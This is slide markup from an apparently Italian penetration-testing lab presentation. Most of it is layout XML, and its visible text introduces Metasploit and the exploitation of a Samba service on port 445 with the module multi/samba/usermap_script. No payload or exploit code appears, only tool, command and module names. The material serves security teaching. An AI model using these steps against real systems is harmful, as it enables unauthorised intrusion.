            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1457878" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="1457877"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152168" y="1457877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1457877"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="4679439">
            <a:off x="8423942" y="5436999"/>
            <a:ext cx="3152168" cy="1387653"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1387653" w="3152168">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3152168" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152168" y="1387653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1387653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-5060"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="996477" y="5057775"/>
            <a:ext cx="15381560" cy="811530"/>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3 - Fase di Exploit</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u"/>
  </p:transition>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702929" y="-285202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340551" y="278671"/>
            <a:ext cx="5102553" cy="707075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6341104" y="438663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3178747" y="461116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AutoShape 18" id="18"/>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19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9970104" y="1978961"/>
            <a:ext cx="7769323" cy="6509433"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6509433" w="7769323">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7769323" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7769323" y="6509433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6509433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="2891828" y="1642892"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573838" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573838" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1798736" y="7536011"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597472" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>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4" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2860856"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3.1 - PANORAMICA DI METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2167408" y="6505317"/>
            <a:ext cx="7250916" cy="2111222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2808"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2006">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Arrivati a questo punto, ci avvarremo di Metasploit per sfruttare la vulnerabilità trovata.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2808"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2808"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2808"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2006">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Per avviare Metasploit in Kali Linux, basta digitare il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2006">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>msfconsole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2006">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>sul terminale.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="123696" y="1694075"/>
            <a:ext cx="5824119" cy="4858867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3228"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2306">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Cos’è Metasploit ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2948"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2948"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2106">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Metasploit è un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2106">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>framework open source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2106">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>che fornisce una vasta gamma di exploit creati dalla comunità e numerosi vettori di attacco che si possono utilizzare contro diversi sistemi e tecnologie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2948"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2948"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2106">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Viene molto utilizzato in fase di exploitation dai penetration tester per sfruttare le vulnerabilità riscontate su sistemi analizzati. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2948"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2948"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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5651559" y="2432218"/>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3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="-4185566"/>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85447" y="8031946"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1081690" y="1216352"/>
            <a:ext cx="7017191" cy="9723929"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="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7" id="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8" id="8"/>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9" id="9"/>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0" id="10"/>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1" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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7" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14933948" y="3185888"/>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18" id="18"/>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19" id="19"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="313289" y="20574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TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3169194" y="442998"/>
            <a:ext cx="14768151" cy="628289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4218"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5700" spc="-518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>3.2 - SFRUTTAMENTO VULN PORTA 445</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 22" id="22"/>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3" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9144000" y="1269967"/>
            <a:ext cx="8112080" cy="5548134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5548134" w="8112080">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8112080" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112080" y="5548133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5548133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-163569" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8908135" y="7549057"/>
            <a:ext cx="6551758" cy="2037855"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2037855" w="6551758">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6551758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6551758" y="2037855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2037855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-102074" b="-180398"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5784339" y="1269967"/>
            <a:ext cx="3009064" cy="2324502"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2324502" w="3009064">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3009064" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009064" y="2324502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2324502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>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7" id="27"/>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8" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="313289" y="3873105"/>
            <a:ext cx="6113918" cy="3427583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2703"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Usando il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>unito al nostro termine di ricerca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, troviamo una lista degli exploit che presentano samba nel nome.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2703"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2703"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Sceglieremo l’exploit numero 15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>(multi/samba/usermap_script)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>  e poi utilizziamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1930">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per ottenere delle informazioni riguardo i parametri e la funzione di questo exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2703"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2703"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 29" id="29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="0">
            <a:off x="5784339" y="6808696"/>
            <a:ext cx="3009064" cy="2324502"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2324502" w="3009064">
                <a:moveTo>
                  <a:pt x="0" y="2324502"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3009064" y="2324502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009064" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2324502"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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5911068" y="3875770"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548482" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548482" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-641928" y="-2354813"/>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387868" y="6313241"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-602870" y="720257"/>
            <a:ext cx="7017191" cy="9723929"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="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7" id="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8" id="8"/>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9" id="9"/>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0" id="10"/>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1" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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6" id="16"/>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7" id="17"/>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2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 18" id="18"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="0" y="2198441"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3486260"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3.2 - SFRUTTAMENTO VULN PORTA 445</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8344154" y="2073626"/>
            <a:ext cx="9540517" cy="1118170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1118170" w="9540517">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9540518" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9540518" y="1118170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1118170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8344154" y="7766154"/>
            <a:ext cx="7165795" cy="1324663"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1324663" w="7165795">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7165796" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165796" y="1324663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1324663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8325104" y="3581573"/>
            <a:ext cx="9363805" cy="3794805"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
